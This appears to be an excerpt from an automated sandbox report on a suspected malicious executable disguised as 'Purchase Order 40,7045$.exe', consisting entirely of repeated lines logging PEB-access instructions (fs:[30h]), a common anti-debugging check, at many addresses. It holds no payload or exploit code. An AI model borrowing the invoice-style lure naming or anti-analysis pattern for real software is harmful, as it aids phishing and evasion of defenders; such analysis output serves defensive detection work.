          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]